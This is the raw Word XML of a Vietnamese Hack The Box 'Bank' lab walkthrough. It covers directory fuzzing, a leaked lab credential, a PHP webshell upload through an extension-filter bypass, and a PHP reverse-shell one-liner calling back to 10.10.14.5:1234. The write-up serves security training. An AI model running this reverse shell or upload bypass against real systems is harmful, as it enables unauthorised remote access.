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57B78" w14:textId="6A6916EC" w:rsidR="002F49FE" w:rsidRDefault="006E69E5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72926B48" wp14:editId="2CF26713">
            <wp:extent cx="5943600" cy="214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3F76" w14:textId="310C8901" w:rsidR="006E69E5" w:rsidRDefault="006E69E5"/>
    <w:p w14:paraId="48F0BDDC" w14:textId="3909C3EB" w:rsidR="006E69E5" w:rsidRDefault="00DB56F5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29AFD787" wp14:editId="5F9D8525">
            <wp:extent cx="5943600" cy="906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E24A" w14:textId="17CF1B82" w:rsidR="00DB56F5" w:rsidRDefault="00DB56F5"/>
    <w:p w14:paraId="7F5F0FE8" w14:textId="2047F778" w:rsidR="00DB56F5" w:rsidRDefault="0069599B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D3A17F6" wp14:editId="25F0C1CF">
            <wp:extent cx="5954350" cy="260069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8" t="17589" r="5670" b="24866"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5987104" cy="261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BC0C" w14:textId="77777777" w:rsidR="00E272E1" w:rsidRDefault="00E272E1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01648776" w14:textId="2E8F471C" w:rsidR="00E272E1" w:rsidRPr="00E11BE7" w:rsidRDefault="00AF6FAA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E11BE7">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://bank.htb/FUZZ -c  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A7D224" w14:textId="4635882B" w:rsidR="00AF6FAA" w:rsidRDefault="00AF6FAA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EB5B257" w14:textId="60566875" w:rsidR="00AF6FAA" w:rsidRDefault="00AF6F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được </w:t>
      </w:r>
      <w:r w:rsidR="006179EB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 điểm vào: assets</w:t>
      </w:r>
      <w:r w:rsidR="006179EB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inc</w:t>
      </w:r>
      <w:r w:rsidR="006179EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> và uploads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0628B6BD" w14:textId="62F72F39" w:rsidR="00AF6FAA" w:rsidRDefault="00AF6FAA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03ED8533" w14:textId="40BBF813" w:rsidR="0069599B" w:rsidRPr="00AF6FAA" w:rsidRDefault="00E272E1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF6FAA">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://bank.htb/inc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8BDB6E" w14:textId="1FAB1FBA" w:rsidR="0069599B" w:rsidRDefault="00E272E1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BBBE51A" wp14:editId="02BD20B7">
            <wp:extent cx="5943600" cy="3439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887" w14:textId="57D1BC6F" w:rsidR="00E11BE7" w:rsidRDefault="00E11B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không đọc được tập tin .php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2436DA73" w14:textId="6767255F" w:rsidR="00E11BE7" w:rsidRDefault="00E11BE7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B11A52B" w14:textId="1CB32787" w:rsidR="00E11BE7" w:rsidRDefault="00157D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Tìm thêm 1 điểm vào nữa cho phép ta đọc tập tin .acc: </w:t>
      </w:r>
      <w:r w:rsidR="009B3BE0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>balance-transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200026DC" w14:textId="40DF7DF8" w:rsidR="009B3BE0" w:rsidRDefault="009B3BE0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58F067D6" w14:textId="658C58CC" w:rsidR="009B3BE0" w:rsidRDefault="009B3B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Điểm vào này ở vị trí cuối trong wordlist </w:t>
      </w:r>
      <w:r w:rsidRPr="009B3BE0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>directory-list-2.3-medium.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nên mình không tìm ra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5437660C" w14:textId="121245C5" w:rsidR="009B3BE0" w:rsidRDefault="002A404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0B51FC" wp14:editId="43CF5BCB">
            <wp:extent cx="5943600" cy="605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29B" w14:textId="46D3C2E6" w:rsidR="009B3BE0" w:rsidRDefault="002A4045">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A404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Phải đợi nó quét hết thư mục ẩn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E8C95F" w14:textId="318216DB" w:rsidR="002A4045" w:rsidRDefault="002A4045">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66B3A520" w14:textId="51FCBEB6" w:rsidR="002A4045" w:rsidRDefault="001A38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Nhiều tập tin .acc quá mình không biết xử lí như thế nào?</w:t>
      </w:r>
      <w:r w:rsidR="00AB187C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Đây là 1 tập tin mẫu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2498F30F" w14:textId="1AB14F82" w:rsidR="001A3819" w:rsidRDefault="001A3819">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F43E587" w14:textId="682D23DB" w:rsidR="001A3819" w:rsidRDefault="00AB18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CC25F6" wp14:editId="35C79CFD">
            <wp:extent cx="5943600" cy="2405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7D4C" w14:textId="0164A64D" w:rsidR="00AB187C" w:rsidRDefault="00AB187C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D4C9BB6" w14:textId="2F42D50C" w:rsidR="00AB187C" w:rsidRDefault="00CF755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1 tập tin khác thường, kích thước nhỏ hơn các tập tin khác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F3FECF" w14:textId="78831B2F" w:rsidR="00CF755A" w:rsidRDefault="00CF755A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58B6C34F" w14:textId="51243BAB" w:rsidR="00CF755A" w:rsidRDefault="004078C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5D7A81" wp14:editId="15FBD8E0">
            <wp:extent cx="5943600" cy="1334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EBF4" w14:textId="2895F1DE" w:rsidR="008C7AFA" w:rsidRDefault="008C7AFA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B6C9FCD" w14:textId="1448D8C8" w:rsidR="008C7AFA" w:rsidRDefault="008C7A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mã hóa không thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3484CF22" w14:textId="660B165A" w:rsidR="004078C4" w:rsidRDefault="004078C4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52657414" w14:textId="49B11B5D" w:rsidR="004078C4" w:rsidRDefault="008C7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E503A5D" wp14:editId="7F67EE0C">
            <wp:extent cx="4953000" cy="290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D28" w14:textId="32C6A05D" w:rsidR="008C7AFA" w:rsidRDefault="008C7AFA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0902D88B" w14:textId="174B931E" w:rsidR="008C7AFA" w:rsidRPr="00BE5D23" w:rsidRDefault="00DB5193">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5D23">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>chris@bank.htb : !##HTBB4nkP4ssw0rd!##</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495798B3" w14:textId="4089EAB6" w:rsidR="00DB5193" w:rsidRDefault="00DB5193">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05FE203D" w14:textId="3957E461" w:rsidR="00DB5193" w:rsidRDefault="00BE5D2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Đăng nhập trang ngân hàng</w:t>
      </w:r>
      <w:r w:rsidR="00D65894">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, giao diện trang web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE127DD" w14:textId="07C34632" w:rsidR="00D65894" w:rsidRDefault="00D65894">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="696897D8" w14:textId="3A15712F" w:rsidR="00D65894" w:rsidRDefault="002472A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0B795F" wp14:editId="533E991E">
            <wp:extent cx="5605153" cy="319430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2" t="17266" r="3692" b="1842"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5624857" cy="320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CBD56" w14:textId="77777777" w:rsidR="002472A6" w:rsidRDefault="002472A6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BE2C598" w14:textId="0F7D2D66" w:rsidR="00BE5D23" w:rsidRDefault="006179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</w:t>
      </w:r>
      <w:r w:rsidR="00B32F43">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Support</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> có tính năng upload file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4750E7" w14:textId="7AB9E6AE" w:rsidR="00BE5D23" w:rsidRDefault="006179E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394986" wp14:editId="19876853">
            <wp:extent cx="4500748" cy="37222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68" cy="37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F05C" w14:textId="3439C24B" w:rsidR="006179EB" w:rsidRPr="00B342D4" w:rsidRDefault="004610F5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF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Mình thử upload webshell.php, ứng dụng báo lỗi: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B342D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>You can</w:t>
      </w:r>
      <w:r w:rsidR="00B342D4" w:rsidRPr="00B342D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00B342D4">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t upload this file. You can upload only images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5477DC" w14:textId="15871980" w:rsidR="004610F5" w:rsidRDefault="004610F5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AEA1099" w14:textId="51FA9963" w:rsidR="004610F5" w:rsidRDefault="00CB55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upload được rabbit.png, vào thư mục uploads có thể xem tập tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DB50CC" w14:textId="19B75B48" w:rsidR="00D45E51" w:rsidRDefault="00D45E51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D8FF7E0" w14:textId="74936ABB" w:rsidR="00CB55C0" w:rsidRDefault="00064D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tin có phần mở rộng là của hình ảnh thì mình sẽ tải lên thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56726FB5" w14:textId="7F34629E" w:rsidR="00952295" w:rsidRDefault="00952295">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17B84EDF" w14:textId="50435A8D" w:rsidR="00952295" w:rsidRDefault="008E55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tải lên webshell.php.png rồi nhưng không thực thi được. Nó trả về source code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F5AB6A" w14:textId="65BDD354" w:rsidR="00B32F43" w:rsidRDefault="00B32F43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FD467C2" w14:textId="45881952" w:rsidR="008E55C6" w:rsidRDefault="00B32F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Trang support.php có 1 hint trong html code mà mình không để ý:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40249FC9" w14:textId="11404093" w:rsidR="008E55C6" w:rsidRDefault="00B32F4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814AA1" wp14:editId="4215486B">
            <wp:extent cx="5943600" cy="174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275" cy="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FC73" w14:textId="5956B8B1" w:rsidR="00B32F43" w:rsidRDefault="00B32F43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EF8543C" w14:textId="47E149B8" w:rsidR="00B32F43" w:rsidRDefault="00F23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FC756E" wp14:editId="286F10B9">
            <wp:extent cx="5909137" cy="8787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2" t="15669" r="19869" b="67071"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5996980" cy="89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600BF" w14:textId="2F983A22" w:rsidR="00F23FF2" w:rsidRDefault="00F23FF2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DFAE9AA" w14:textId="22405601" w:rsidR="00596268" w:rsidRDefault="005962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Cách lấy reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19301D03" w14:textId="77777777" w:rsidR="00596268" w:rsidRDefault="00596268">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B17A64D" w14:textId="1BFF637C" w:rsidR="00F23FF2" w:rsidRPr="00596268" w:rsidRDefault="00596268">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00596268">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php -r '$sock=fsockopen("10.10.14.5",1234);exec("/bin/bash &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3505958B" w14:textId="77777777" w:rsidR="00064D52" w:rsidRDefault="00064D52">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="108F4A59" w14:textId="71132E4D" w:rsidR="00CB55C0" w:rsidRDefault="001518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7CBD75" wp14:editId="756CFC2D">
            <wp:extent cx="5943600" cy="1504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25CE" w14:textId="568AFD9E" w:rsidR="0015182E" w:rsidRDefault="0015182E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D306F91" w14:textId="133ECFCB" w:rsidR="0015182E" w:rsidRDefault="001518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Bật interactive mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB64C3A" w14:textId="4B9730B9" w:rsidR="0015182E" w:rsidRDefault="0015182E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02351987" w14:textId="75402DF7" w:rsidR="0015182E" w:rsidRDefault="0015182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1EDB5B" wp14:editId="42C75CCE">
            <wp:extent cx="4762500" cy="46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427C" w14:textId="7763FDF7" w:rsidR="0015182E" w:rsidRDefault="0015182E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5212EF08" w14:textId="4B3C6A97" w:rsidR="0015182E" w:rsidRDefault="00225B0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2ABFEA" wp14:editId="32859F48">
            <wp:extent cx="3429000" cy="63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1019" w14:textId="00C088D8" w:rsidR="00225B03" w:rsidRDefault="00225B03">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="754E804F" w14:textId="06279362" w:rsidR="00225B03" w:rsidRDefault="009E2A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1 tập tin nhìn rất lạ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1B7AF1" w14:textId="754868DB" w:rsidR="009E2ACE" w:rsidRDefault="009E2ACE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75EB9CC1" w14:textId="53F7A689" w:rsidR="009E2ACE" w:rsidRDefault="00215B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C5D6C1" wp14:editId="524265C8">
            <wp:extent cx="5943600" cy="567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26A1" w14:textId="430B4521" w:rsidR="00AF10E3" w:rsidRDefault="00AF10E3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="056A215C" w14:textId="2267E260" w:rsidR="00CB783B" w:rsidRDefault="00AF10E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D70461" wp14:editId="2B1090B9">
            <wp:extent cx="2616200" cy="105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391F" w14:textId="4DF00F3C" w:rsidR="00AF10E3" w:rsidRDefault="00AF10E3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D855AC0" w14:textId="4A22B31B" w:rsidR="00AF10E3" w:rsidRDefault="00AF10E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566C59" wp14:editId="29876461">
            <wp:extent cx="3314700" cy="64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2CB" w14:textId="045E487C" w:rsidR="00AF10E3" w:rsidRDefault="00AF10E3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="300F6104" w14:textId="77777777" w:rsidR="00AF10E3" w:rsidRPr="00E11BE7" w:rsidRDefault="00AF10E3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00AF10E3" w:rsidRPr="00E11B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C05"/>
    <w:rsid w:val="00005C05"/>
    <w:rsid w:val="00064D52"/>
    <w:rsid w:val="0015182E"/>
    <w:rsid w:val="00157D69"/>
    <w:rsid w:val="001A3819"/>
    <w:rsid w:val="00215B1B"/>
    <w:rsid w:val="00225B03"/>
    <w:rsid w:val="002472A6"/>
    <w:rsid w:val="002A4045"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="004078C4"/>
    <w:rsid w:val="004610F5"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="00596268"/>
    <w:rsid w:val="006179EB"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="0069599B"/>
    <w:rsid w:val="006E69E5"/>
    <w:rsid w:val="008C7AFA"/>
    <w:rsid w:val="008E55C6"/>
    <w:rsid w:val="008F01BF"/>
    <w:rsid w:val="00952295"/>
    <w:rsid w:val="009B3BE0"/>
    <w:rsid w:val="009E2ACE"/>
    <w:rsid w:val="00AB187C"/>
    <w:rsid w:val="00AF10E3"/>
    <w:rsid w:val="00AF6FAA"/>
    <w:rsid w:val="00B32F43"/>
    <w:rsid w:val="00B342D4"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00BE5D23"/>
    <w:rsid w:val="00CB55C0"/>
    <w:rsid w:val="00CB783B"/>
    <w:rsid w:val="00CF755A"/>
    <w:rsid w:val="00D45E51"/>
    <w:rsid w:val="00D65894"/>
    <w:rsid w:val="00DB5193"/>
    <w:rsid w:val="00DB56F5"/>
    <w:rsid w:val="00E11BE7"/>
    <w:rsid w:val="00E272E1"/>
    <w:rsid w:val="00F2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D2B3E63"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5AC0845E-D33C-3148-8B6E-CE553B5A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2024-08-03T03:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-03T10:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>